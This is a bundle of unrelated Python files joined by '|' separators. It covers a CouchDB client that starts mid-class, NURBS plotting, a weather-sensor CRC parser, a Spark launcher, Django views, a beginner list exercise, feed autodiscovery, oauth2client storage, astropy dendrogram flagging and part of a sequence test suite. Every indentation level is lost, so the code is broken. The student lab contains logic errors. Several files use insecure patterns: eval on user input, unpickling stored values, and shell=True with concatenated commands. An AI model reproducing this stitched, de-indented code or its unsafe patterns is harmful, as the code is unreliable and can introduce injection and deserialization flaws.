""" Object that abstract access to a CouchDB database
A Database object can act as a Dict object.
"""
def __init__(self, uri, **client_opts):
self.raw_uri = uri
if uri.startswith("desktopcouch://"):
if not desktopcouch:
raise AppError("Desktopcouch isn't available on this"+
"machine. You can't access to %s" % db_string)
uri = "http://localhost:%s/%s" % (
desktopcouch.find_port(), uri[15:])
ctx = desktopcouch.local_files.DEFAULT_CONTEXT
oauth_tokens = desktopcouch.local_files.get_oauth_tokens(ctx)
consumer = oauth.Consumer(oauth_tokens["consumer_key"],
oauth_tokens["consumer_secret"])
token = oauth.Token(oauth_tokens["token"],
oauth_tokens["token_secret"])
oauth_filter = OAuthFilter("*", consumer, token)
filters = client_opts.get("filters") or []
filters.append(oauth_filter)
client_opts["filters"] = filters
CouchdbResource.__init__(self, uri=uri, **client_opts)
self.server_uri, self.dbname = uri.rsplit('/', 1)
self.uuids = Uuids(self.server_uri, **client_opts)
self.version = couchdb_version(self.server_uri)
if self.uri.endswith("/"):
self.uri = self.uri[:-1]
# create the db
try:
self.head()
except ResourceNotFound:
self.put()
def info(self):
"""
Get database information
@param _raw_json: return raw json instead deserializing it
@return: dict
"""
return self.get().json_body
def all_docs(self, **params):
"""
return all_docs
"""
return self.view('_all_docs', **params)
def open_doc(self, docid, wrapper=None, **params):
"""Open document from database
Args:
@param docid: str, document id to retrieve
@param rev: if specified, allows you to retrieve
a specific revision of document
@param wrapper: callable. function that takes dict as a param.
Used to wrap an object.
@params params: Other params to pass to the uri (or headers)
@return: dict, representation of CouchDB document as
a dict.
"""
resp = self.get(escape_docid(docid), **params)
if wrapper is not None:
if not callable(wrapper):
raise TypeError("wrapper isn't a callable")
return wrapper(resp.json_body)
return resp.json_body
def save_doc(self, doc, encode=False, force_update=False, **params):
""" Save a document. It will use the `_id` member of the document
or request a new uuid from CouchDB. IDs are attached to
documents on the client side because POST has the curious property of
being automatically retried by proxies in the event of network
segmentation and lost responses.
@param doc: dict. doc is updated
with doc '_id' and '_rev' properties returned
by CouchDB server when you save.
@param force_update: boolean, if there is conlict, try to update
with latest revision
@param encode: Encode attachments if needed (depends on couchdb version)
@return: new doc with updated revision an id
"""
if '_attachments' in doc and encode:
doc['_attachments'] = encode_attachments(doc['_attachments'])
headers = params.get('headers', {})
headers.setdefault('Content-Type', 'application/json')
params['headers'] = headers
if '_id' in doc:
docid = escape_docid(doc['_id'])
try:
resp = self.put(docid, payload=json.dumps(doc), **params)
except ResourceConflict:
if not force_update:
raise
rev = self.last_rev(doc['_id'])
doc['_rev'] = rev
resp = self.put(docid, payload=json.dumps(doc), **params)
else:
json_doc = json.dumps(doc)
try:
doc['_id'] = self.uuids.next()
resp = self.put(doc['_id'], payload=json_doc, **params)
except ResourceConflict:
resp = self.post(payload=json_doc, **params)
json_res = resp.json_body
doc1 = {}
for a, n in aliases.items():
if a in json_res:
doc1[n] = json_res[a]
doc.update(doc1)
return doc
def last_rev(self, docid):
""" Get last revision from docid (the '_rev' member)
@param docid: str, undecoded document id.
@return rev: str, the last revision of document.
"""
r = self.head(escape_docid(docid))
return r.headers['etag'].strip('"')
def delete_doc(self, id_or_doc):
""" Delete a document
@param id_or_doc: docid string or document dict
"""
if isinstance(id_or_doc, types.StringType):
docid = id_or_doc
resp = self.delete(escape_docid(id_or_doc),
rev=self.last_rev(id_or_doc))
else:
docid = id_or_doc.get('_id')
if not docid:
raise ValueError('Not valid doc to delete (no doc id)')
rev = id_or_doc.get('_rev', self.last_rev(docid))
resp = self.delete(escape_docid(docid), rev=rev)
return resp.json_body
def save_docs(self, docs, all_or_nothing=False, use_uuids=True):
""" Bulk save. Modify Multiple Documents With a Single Request
@param docs: list of docs
@param use_uuids: add _id in doc who don't have it already set.
@param all_or_nothing: In the case of a power failure, when the database
restarts either all the changes will have been saved or none of them.
However, it does not do conflict checking, so the documents will
@return doc lists updated with new revision or raise BulkSaveError
exception. You can access to doc created and docs in error as properties
of this exception.
"""
def is_id(doc):
return '_id' in doc
if use_uuids:
noids = []
for k, g in itertools.groupby(docs, is_id):
if not k:
noids = list(g)
for doc in noids:
nextid = self.uuids.next()
if nextid:
doc['_id'] = nextid
payload = { "docs": docs }
if all_or_nothing:
payload["all-or-nothing"] = True
# update docs
res = self.post('/_bulk_docs', payload=json.dumps(payload),
headers={'Content-Type': 'application/json'})
json_res = res.json_body
errors = []
for i, r in enumerate(json_res):
if 'error' in r:
doc1 = docs[i]
doc1.update({'_id': r['id'],
'_rev': r['rev']})
errors.append(doc1)
else:
docs[i].update({'_id': r['id'],
'_rev': r['rev']})
if errors:
raise BulkSaveError(docs, errors)
def delete_docs(self, docs, all_or_nothing=False, use_uuids=True):
""" multiple doc delete."""
for doc in docs:
doc['_deleted'] = True
return self.save_docs(docs, all_or_nothing=all_or_nothing,
use_uuids=use_uuids)
def fetch_attachment(self, id_or_doc, name, headers=None):
""" get attachment in a document
@param id_or_doc: str or dict, doc id or document dict
@param name: name of attachment default: default result
@param header: optionnal headers (like range)
@return: `couchdbkit.resource.CouchDBResponse` object
"""
if isinstance(id_or_doc, basestring):
docid = id_or_doc
else:
docid = id_or_doc['_id']
return self.get("%s/%s" % (escape_docid(docid), name), headers=headers)
def put_attachment(self, doc, content=None, name=None, headers=None):
""" Add attachement to a document. All attachments are streamed.
@param doc: dict, document object
@param content: string, iterator, fileobj
@param name: name or attachment (file name).
@param headers: optionnal headers like `Content-Length`
or `Content-Type`
@return: updated document object
"""
headers = {}
content = content or ""
if name is None:
if hasattr(content, "name"):
name = content.name
else:
raise InvalidAttachment(
'You should provid a valid attachment name')
name = util.url_quote(name, safe="")
res = self.put("%s/%s" % (escape_docid(doc['_id']), name),
payload=content, headers=headers, rev=doc['_rev'])
json_res = res.json_body
if 'ok' in json_res:
return doc.update(self.open_doc(doc['_id']))
return False
def delete_attachment(self, doc, name):
""" delete attachement to the document
@param doc: dict, document object in python
@param name: name of attachement
@return: updated document object
"""
name = util.url_quote(name, safe="")
self.delete("%s/%s" % (escape_docid(doc['_id']), name),
rev=doc['_rev']).json_body
return doc.update(self.open_doc(doc['_id']))
def view(self, view_name, **params):
try:
dname, vname = view_name.split("/")
path = "/_design/%s/_view/%s" % (dname, vname)
except ValueError:
path = view_name
if "keys" in params:
keys = params.pop("keys")
return self.post(path, json.dumps({"keys": keys}, **params)).json_body
return self.get(path, **params).json_body
def encode_params(params):
""" encode parameters in json if needed """
_params = {}
if params:
for name, value in params.items():
if value is None:
continue
if name in ('key', 'startkey', 'endkey') \
or not isinstance(value, basestring):
value = json.dumps(value).encode('utf-8')
_params[name] = value
return _params
def escape_docid(docid):
if docid.startswith('/'):
docid = docid[1:]
if docid.startswith('_design'):
docid = '_design/%s' % util.url_quote(docid[8:], safe='')
else:
docid = util.url_quote(docid, safe='')
return docid
def encode_attachments(attachments):
for k, v in attachments.iteritems():
if v.get('stub', False):
continue
else:
re_sp = re.compile('\s')
v['data'] = re_sp.sub('', base64.b64encode(v['data']))
return attachments
|
# -*- coding: utf-8 -*-
from nurbs import Surface as ns
from nurbs import utilities as utils
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Create a NURBS surface instance
surf = ns.Surface()
# Set up the NURBS surface
surf.read_ctrlpts("data\CP_Surface2.txt")
surf.degree_u = 3
surf.degree_v = 3
surf.knotvector_u = utils.autogen_knotvector(surf.degree_u, 6)
surf.knotvector_v = utils.autogen_knotvector(surf.degree_v, 6)
# Evaluate surface
surf.evaluate_rational()
# Calculate 1st order surface derivative at the given u and v
u = 0.2
v = 0.9
surftan = surf.tangent(u, v)
print("* Surface point at u = %.2f and v = %.2f is (%.2f, %.2f, %.2f)" % (u, v, surftan[0][0], surftan[0][1], surftan[0][2]))
print("* First derivative w.r.t. u is (%.2f, %.2f, %.2f)" % (surftan[1][0], surftan[1][1], surftan[1][2]))
print("* First derivative w.r.t. v is (%.2f, %.2f, %.2f)\n" % (surftan[2][0], surftan[2][1], surftan[2][2]))
# Calculate normal at the given u and v
norm = surf.normal(u, v)
print("* Normal at u = %.2f and v = %.2f is [%.1f, %.1f, %.1f]\n" % (u, v, norm[0], norm[1], norm[2]))
# Arrange calculated surface data for plotting
surfpts_x = []
surfpts_y = []
surfpts_z = []
for spt in surf.surfpts:
surfpts_x.append(spt[0])
surfpts_y.append(spt[1])
surfpts_z.append(spt[2])
# Plot using Matplotlib
fig = plt.figure(figsize=(10.67, 8), dpi=96)
ax = fig.gca(projection='3d')
#surfplt = ax.scatter(surfpts_x, surfpts_y, surfpts_z, c="green", s=10, depthshade=True) # 3D Scatter plot
surfplt = ax.plot_trisurf(surfpts_x, surfpts_y, surfpts_z, cmap=plt.cm.winter) # 3D Tri-Surface plot
ax.set_xlim(-25, 25)
ax.set_ylim(-25, 25)
ax.set_zlim(-15, 15)
fig.show()
print("End of NURBS-Python Example")
|
# -*- coding: iso-8859-15 -*-
'''
Created on 12.03.2015
@author: buchfink
'''
import math
POLYNOMIAL = 0x1021
PRESET = 0
def _initial(c):
crc = 0
c = c << 8
for _ in range(8):
if (crc ^ c) & 0x8000:
crc = (crc << 1) ^ POLYNOMIAL
else:
crc = crc << 1
c = c << 1
return crc
_tab = [ _initial(i) for i in range(256) ]
def _update_crc(crc, c):
cc = 0xff & c
tmp = (crc >> 8) ^ cc
crc = (crc << 8) ^ _tab[tmp & 0xff]
crc = crc & 0xffff
return crc
# Calculates the crc
def crc(data):
crc = PRESET
for idx in range(2, 10):
crc = _update_crc(crc, int(data[idx], 16))
return crc
# Check line for crc
def check(line):
return crc(line.split()) == 0
# formats the line
def formatData(line):
data = line.split()
if len(data) == 0 or data[0] != 'I':
return line
value = ""
for idx in range(len(data)):
if idx > 0:
value += " "
if idx >= 2 and idx < 10:
value += ("0" + data[idx]) if len(data[idx]) == 1 else data[idx]
elif idx == 10:
value += (" " + data[idx])
else:
value += data[idx]
return value
# returns the sensor id
def sensor(line):
if len(line) == 0:
return ' '
elif line[0] <> 'I':
return line[0]
elif len(line) > 6:
if line[6] == '2':
return 'V'
elif line[6] == '5':
return 'R'
elif line[6] == '7':
return 'S'
elif line[6] == '8':
return 'T'
elif line[6] == '9':
return 'G'
elif line[6] == 'A':
return 'H'
elif line[6] == 'E':
return 'N'
else:
return 'I'
else:
return 'I'
# Parses values from line
def description(line):
description = "unknown"
data = line.split()
# Pressure
if data[0] == 'A' and len(data) == 7:
p = round(float(data[4]) / 100.0, 2)
description = "p=" + str(p) + "hPa"
elif data[0] == 'B' and len(data) == 7:
p = round(math.pow(math.pow(float(data[4])/100.0, 0.1902614) + 8.417168e-05 * 310.17, 5.255927), 1)
description = "p=" + str(p) + "hPa"
elif data[0] == 'I' and crc(data) != 0:
return "invalid crc"
elif data[0] == 'I':
header = int(data[2], 16) >> 4
windSpeed = int(round(int(data[3], 16) * 1.609344, 0))
windDirections = (int(data[4], 16) << 2) | (int(data[6], 16) & 0x02)
windDirections = 360 if windDirections > 1024 or windDirections <= 0 else int(round(windDirections * 360.0 / 1024.0))
windData = " w(" + str(windSpeed) + "km/h, " + str(windDirections) + "°)"
# akku voltage
if header == 0x2:
voltage = round(((int(data[5], 16) << 2) + ((int(data[6], 16) & 0xC0) >> 6)) / 100.0, 1)
description = "v=" + str(voltage) + "V"
elif header == 0x3:
description = "unknown" # not implemented
# rain rate
elif header == 0x5:
rr = 0
rr1 = int(data[5], 16)
rr2 = int(data[6], 16)
if rr1 != 0xff:
if (rr2 & 0x40) == 0:
rr = round(11520.0/(((rr2 & 0x30) << 4) | rr1), 1)
elif (rr2 & 0x40) == 0x40:
rr = round(11520.0/(((rr2 & 0x30) << 8) | (rr1 << 4)), 1)
description = "rr=" + str(rr) + "mm/h"
# solar radiation
elif header == 0x7:
sol = (int(data[5], 16) << 2) + ((int(data[6], 16) & 0xC0) >> 6)
description = "sol=" + str(sol)
# temperature
elif header == 0x8:
value = int(data[5], 16) * 256 + int(data[6], 16)
value = value - 65536 if value > 32767 else value
temperature = round((value/160.0 - 32.0)*5.0/9.0, 1)
description = "t=" + str(temperature) + "°C"
# gust speed
elif header == 0x9:
gustSpeed = int(round(int(data[5], 16) * 1.609344, 0))
description = "g=" + str(gustSpeed) + "km/h"
# humidity
elif header == 0xA:
value = ((int(data[6], 16) >> 4) << 8) + int(data[5], 16)
humidity = int(round(value * 1.01 / 10.0, 0))
humidity = 100 if humidity > 100 else humidity
description = "h=" + str(humidity) + "%"
# rain ticks
elif header == 0xE:
ticks = value = int(data[5], 16) & 0x7f
description = "r=" + str(ticks)
description = "%-12s%s" % (description,windData)
return description
|
import atexit
import os
import platform
import subprocess
import time
import sys
import signal
from colorama import Fore
from rtxlib import info, error
from rtxlib.preprocessors.PreProcessor import PreProcessor
class SparkPreProcessor(PreProcessor):
""" Implements a preprocessor in spark """
def __init__(self, wf, p):
try:
self.submit_mode = p["submit_mode"]
self.job_file = p["job_file"]
self.job_class = p["job_class"]
info("> PreProcessor | Spark | Mode: " + str(self.submit_mode) + " | Args: " + str(
self.job_class), Fore.CYAN)
except KeyError as e:
error("configuration.spark was incomplete: " + str(e))
exit(1)
spark_home = os.environ.get("SPARK_HOME")
spark_bin = "/bin/spark-submit"
# now we start the spark to run the job in
# http://stackoverflow.com/questions/13243807/popen-waiting-for-child-process-even-when-the-immediate-child-has-terminated/13256908#13256908
# set system/version dependent "start_new_session" analogs
kwargs = {}
if platform.system() == 'Windows':
CREATE_NEW_PROCESS_GROUP = 0x00000200 # note: could get it from subprocess
DETACHED_PROCESS = 0x00000008 # 0x8 | 0x200 == 0x208
kwargs.update(creationflags=DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
kwargs.update(start_new_session=True)
# starting a subprocess to allow termination of spark after we are done
self.process = subprocess.Popen(spark_home + spark_bin + ' --class ' + self.job_class + \
' ./' + wf.folder + '/' + self.job_file, stdout=subprocess.PIPE, shell=True,
**kwargs)
# register a shutdown callback on this thread
atexit.register(self.shutdown)
# wait for some time to get spark time to boot up
time.sleep(10)
def shutdown(self):
""" this is called after the reads has been stopped """
try:
# first try to send a sigterm to the PID
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
except:
pass
try:
# alternative try a normal process kill
self.process.kill()
except:
pass
|
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import render, get_list_or_404
from django.db.models import Q
from .models import Entry
@login_required
def overview(request, category="Allgemein"):
entries = Entry.objects.all().order_by('-created')[:5]
return render(request, 'blog/list.html', {'entries': entries})
def year(request, year):
entries = Entry.objects.filter(created__year=year).order_by('-created')
return render(request, 'blog/list.html', {'entries': entries})
def month(request, year, month):
entries = get_list_or_404(Entry.objects.order_by('-created'), created__year=year, created__month=month)
return render(request, 'blog/list.html', {'entries': entries})
def day(request, year, month, day):
entries = get_list_or_404(Entry.objects.order_by('-created'), created__year=year, created__month=month, created__day=day)
return render(request, 'blog/list.html', {'entries': entries})
def tag(request, tag):
try:
entries = Entry.objects.filter(Q(tags=tag)).order_by('-created')
except Entry.DoesNotExist:
raise Http404("Dieser Beitrag konnte leider nicht gefunden werden.")
return render(request, 'blog/list.html', {'entries': entries})
|
#!/usr/bin/env python3
#Create a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.
fruit = ['Apples', 'Pears', 'Oranges', 'Peaches']
#Display the list.
print(fruit)
#Ask the user for another fruit and add it to the end of the list.
new_fruit = input("Enter another Fruit: ")
fruit.append(new_fruit)
#Display the list.
print(fruit)
#Ask the user for a number and display the number back to the user and
#the fruit corresponding to that number (on a 1-is-first basis).
num = eval(input("Enter a number: "))
print('You Entered ',num,' which is ',fruit[(num-1)],' in the list')
#Add another fruit to the beginning of the list using “+” and display the list.
new_fruit1 = input("Enter another Fruit: ")
fruit = [new_fruit1] + fruit
print(fruit)
#Add another fruit to the beginning of the list using insert() and display the list.
new_fruit2 = input("Enter another Fruit: ")
fruit.insert(0,new_fruit2)
print(fruit)
#Display all the fruits that begin with “P”, using a for loop.
length = len(fruit)
for i in range (0,length):
#print(fruit[i])
if fruit[i][0]=='p' or fruit[i][0]=='P':
print (fruit[i])
"""part two of lab"""
#Display the list.
print (fruit)
#Remove the last fruit from the list.
del fruit[-1]
#Display the list.
print(fruit)
#Ask the user for a fruit to delete and find it and delete it.
fruit_remove = input("Enter a Fruit to remove: ")
fruit.remove(fruit_remove)
print(fruit)
"""Part 3 of Lab"""
#Ask the user for input displaying a line like “Do you like apples?”
for i in fruit:
print("do you like ",i)
likes = input("Enter (y/n): ")
if likes == 'n':
i = 'remove'
fruit.remove('remove')
fruit.lower()
#for each fruit in the list (making the fruit all lowercase).
#For each “no”, delete that fruit from the list.
#For any answer that is not “yes” or “no”, prompt the user to answer
#with one of those two values (a while loop is good here):
#Display the list.
print(fruit)
|
# -*- coding: utf-8 -*-
# Copyright 2010 Mark Lee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''\
An autodiscovery library.
.. moduleauthor:: Mark Lee <cardisco lazymalevolence com>
'''
import html5lib
import httplib2
from importlib import import_module
MODULES = {
'application/atom+xml': '.atom',
'application/rss+xml': '.rss',
'application/rdf+xml': '.rdf',
'application/opensearchdescription+xml': '.opensearch',
}
_MODULE_CACHE = {}
HTTP_ACCEPT = '%s, text/html, text/*; q=0.5' % ', '.join(MODULES.keys())
def discover(url, http=None, **kwargs):
'''Discovers various metadata URLs embedded in an HTML document, such
as feeds and RDF.
:param str url: The URL to retrieve the HTML document from.
:param http: The :mod:`httplib2` HTTP object. If it's not set, one will
be created.
:type http: :class:`httplib2.Http` or :const:`None`
:param dict \*\*kwargs: Extra arguments to :meth:`httplib2.Http.request`.
:returns: A dictionary, where the key is the URL's MIME type and the value
is a dictionary of URL-title pairs.
:rtype: :class:`dict`
'''
if not http:
http = httplib2.Http()
if 'headers' in kwargs:
kwargs['headers']['Accept'] = HTTP_ACCEPT
else:
kwargs['headers'] = {
'Accept': HTTP_ACCEPT,
}
response, content = http.request(url, **kwargs)
if response['content-type'] in MODULES:
# assume the server's not lying
return {
response['content_type']: {
url: None,
},
}
# TODO if someone wishes to, they can implement the MIME sniffing
# algorithm here.
return parse_html(content, url=url)
def parse_html(file_obj_or_str, url=None):
'''Discovers various metadata URLs embedded in a given HTML document, such
as feeds and RDF.
:param file_obj_or_str: The HTML document to be parsed.
:type file_obj_or_str: a file-like object or :class:`str`
:param url: The URL that the HTML document was retrieved from.
:type url: :class:`str` or :const:`None`
:returns: A dictionary, where the key is the URL's MIME type and the value
is a dictionary of URL-title pairs.
:rtype: :class:`dict`
'''
urls = {}
# load the modules only when the function is first called.
if not _MODULE_CACHE:
for name, module in MODULES.iteritems():
mod = import_module(module, package=__name__)
try:
_MODULE_CACHE[name] = mod.Discoverer
except AttributeError:
raise AttributeError('''\
Could not find a Discoverer object in the %s module.''' % name)
doc = html5lib.parse(file_obj_or_str, treebuilder='lxml')
print type(doc)
for name, discoverer in _MODULE_CACHE.iteritems():
urls[name] = discoverer.parse(doc, url=url)
return urls
|
import math
def funct_if(test,var_true,var_false):
if (test):
return var_true
else:
return var_false
def scale(var_old_min, var_old_max, var_new_min, var_new_max, var_value):
OldSRange = (var_old_max - var_old_min)
NewSRange = (var_new_max - var_new_min)
return (((var_value - var_old_min) * NewSRange) / OldSRange) + var_new_min
def is_even(value_to_test):
return value_to_test % 2 == 0
def draw_funct(dfunction, dxmin, dxmax, dymin, dymax, resolution):
dx = scale(0,canvas_width,dxmin,dxmax,x)
cdy = eval(dfunction)
dx = scale(0,canvas_width,dxmin,dxmax,x-resolution)
pdy = eval(dfunction)
dx = scale(0,canvas_width,dxmin,dxmax,x+resolution)
ndy = eval(dfunction)
cdsy = canvas_height - scale(dymin,dymax,0,canvas_height,cdy)
pdsy = canvas_height - scale(dymin,dymax,0,canvas_height,pdy)
ndsy = canvas_height - scale(dymin,dymax,0,canvas_height,ndy)
dyval = scale(0,canvas_height,dymin,dymax,y)
py = scale(dymin,dymax,0,canvas_height,dyval-resolution)
ny = scale(dymin,dymax,0,canvas_height,dyval+resolution)
#if y - cdsy > py - pdsy and y - cdsy < ny - ndsy:
#if (cdsy - y < pdsy - y and cdsy - y > ndsy - y) or (cdsy - y > pdsy - y and cdsy - y < ndsy - y):
if (0 < pdsy - y and 0 > ndsy - y) or (0 > pdsy - y and 0 < ndsy - y) or round(cdsy - y) == 0:
# print("dx: " + str(dx) + " , dy: " + str(dy))
# if y - dsy < resolution + 1 and y - dsy > 0-(resolution + 1): #round(dsy) == y:
return 255
else:
return 0
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Credentials):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
class FlowField(models.Field):
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(FlowField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Flow):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
class Storage(BaseStorage):
"""Store and retrieve a single credential to and from
the datastore.
This Storage helper presumes the Credentials
have been stored as a CredenialsField
on a db model class.
"""
def __init__(self, model_class, key_name, key_value, property_name):
"""Constructor for Storage.
Args:
model: db.Model, model class
key_name: string, key name for the entity that has the credentials
key_value: string, key value for the entity that has the credentials
property_name: string, name of the property that is an CredentialsProperty
"""
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credential = None
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query)
if len(entities) > 0:
credential = getattr(entities[0], self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
def locked_put(self, credentials):
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
args = {self.key_name: self.key_value}
entity = self.model_class(**args)
setattr(entity, self.property_name, credentials)
entity.save()
def locked_delete(self):
"""Delete Credentials from the datastore."""
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query).delete()
|
from astropy import table
from astropy import log
import numpy as np
def flag_dendro(dend, catalog=None, smooth=False, pixels_with_bad=[],
colname='IsNotH2CO', flag_descendants=True):
"""
Remove / flag as "bad" objects in the dendrogram that are not H2CO
This was done manually; there is now (Jan 17, 2015) an automated approach
in dendro_temperature
"""
if catalog is not None and colname not in catalog.colnames:
catalog.add_column(table.Column(name=colname, dtype=bool,
data=np.zeros(len(catalog),
dtype='bool')))
for obj in dend:
obj.bad = False
for x,y,z in pixels_with_bad:
z = z-64 # Jan 25: the cubes were shifted
if z < 0: continue
bad_obj = dend.structure_at([z/(2 if smooth else 1),y,x])
if bad_obj and flag_descendants:
bad_obj = bad_obj.ancestor
bad_obj.bad = True
if catalog is not None:
catalog[bad_obj.idx][colname] = True
for obj in bad_obj.descendants:
obj.bad = True
catalog[obj.idx][colname] = True
elif bad_obj:
obj = bad_obj
# flag the ancestors, but not the ancenstors' parents
while obj:
obj.bad = True
if catalog is not None:
catalog[obj.idx][colname] = True
obj = obj.parent
else:
# sometimes these don't get IDd?
pass
def flag_hc3n(dend, catalog, smooth):
pixels_with_bad = [(518,122,142),
(508,123,10),
(533,124,48),
(857,103,126),
(904,102,105),
(884,95,118),
(515, 108, 1),
]
flag_dendro(dend, catalog, smooth, pixels_with_bad=pixels_with_bad,
colname='IsNotH2CO')
# This should not happen, but can if the table was read manually:
# the table reads true/false as strings:
# https://github.com/astropy/astropy/issues/2974
if issubclass(catalog['IsNotH2CO'].dtype.type, str):
col = catalog['IsNotH2CO']
catalog.remove_column('IsNotH2CO')
catalog.add_column(table.Column(name='IsNotH2CO',
dtype='bool',
data=col=='True'))
log.info("Flagged {0} dendrogram objects as HC3N".format(catalog['IsNotH2CO'].sum()))
def flag_absorption(dend, catalog=None, smooth=False):
"""
Flag out things associated with absorption in one or both of the Sgr B2
lines
"""
# add 64 because I got these from the post-Jan25 cubes
pixels_with_bad = [(511,124,221+64),
(512,124,181+64),
(516,125,218+64),
(517,121,197+64),
(515,120,240+64),
]
flag_dendro(dend, catalog, smooth, pixels_with_bad=pixels_with_bad,
colname='IsAbsorption', flag_descendants=False)
if issubclass(catalog['IsAbsorption'].dtype.type, str):
col = catalog['IsAbsorption']
catalog.remove_column('IsAbsorption')
catalog.add_column(table.Column(name='IsAbsorption',
dtype='bool',
data=col=='True'))
log.info("Flagged {0} dendrogram objects as Absorption".format(catalog['IsAbsorption'].sum()))
|
"""
Tests common to tuple, list and UserList.UserList
"""
import unittest
import sys
import pickle
# Various iterables
# This is used for checking the constructor (here and in test_deque.py)
def iterfunc(seqn):
'Regular generator'
for i in seqn:
yield i
class Sequence:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class IterFunc:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class IterGen:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class IterNextOnly:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class IterNoNext:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class IterGenExc:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class IterFuncStop:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def itermulti(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, iterfunc(IterGen(Sequence(seqn)))))
class CommonTest(unittest.TestCase):
# The type to be tested
type2test = None
def test_constructors(self):
l0 = []
l1 = [0]
l2 = [0, 1]
u = self.type2test()
u0 = self.type2test(l0)
u1 = self.type2test(l1)
u2 = self.type2test(l2)
uu = self.type2test(u)
uu0 = self.type2test(u0)
uu1 = self.type2test(u1)
uu2 = self.type2test(u2)
v = self.type2test(tuple(u))
class OtherSeq:
def __init__(self, initseq):
self.__data = initseq
def __len__(self):
return len(self.__data)
def __getitem__(self, i):
return self.__data[i]
s = OtherSeq(u0)
v0 = self.type2test(s)
self.assertEqual(len(v0), len(s))
s = "this is also a sequence"
vv = self.type2test(s)
self.assertEqual(len(vv), len(s))
# Create from various iteratables
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (Sequence, IterFunc, IterGen,
itermulti, iterfunc):
self.assertEqual(self.type2test(g(s)), self.type2test(s))
self.assertEqual(self.type2test(IterFuncStop(s)), self.type2test())
self.assertEqual(self.type2test(c for c in "123"), self.type2test("123"))
self.assertRaises(TypeError, self.type2test, IterNextOnly(s))
self.assertRaises(TypeError, self.type2test, IterNoNext(s))
self.assertRaises(ZeroDivisionError, self.type2test, IterGenExc(s))
def test_truth(self):
self.assertFalse(self.type2test())
self.assertTrue(self.type2test([42]))
def test_getitem(self):
u = self.type2test([0, 1, 2, 3, 4])
for i in range(len(u)):
self.assertEqual(u[i], i)
self.assertEqual(u[int(i)], i)
for i in range(-len(u), -1):
self.assertEqual(u[i], len(u)+i)
self.assertEqual(u[int(i)], len(u)+i)
self.assertRaises(IndexError, u.__getitem__, -len(u)-1)
self.assertRaises(IndexError, u.__getitem__, len(u))
self.assertRaises(ValueError, u.__getitem__, slice(0,10,0))
u = self.type2test()
self.assertRaises(IndexError, u.__getitem__, 0)
self.assertRaises(IndexError, u.__getitem__, -1)
self.assertRaises(TypeError, u.__getitem__)
a = self.type2test([10, 11])
self.assertEqual(a[0], 10)
self.assertEqual(a[1], 11)
self.assertEqual(a[-2], 10)
self.assertEqual(a[-1], 11)
self.assertRaises(IndexError, a.__getitem__, -3)
self.assertRaises(IndexError, a.__getitem__, 3)
def test_getslice(self):
l = [0, 1, 2, 3, 4]
u = self.type2test(l)
self.assertEqual(u[0:0], self.type2test())
self.assertEqual(u[1:2], self.type2test([1]))
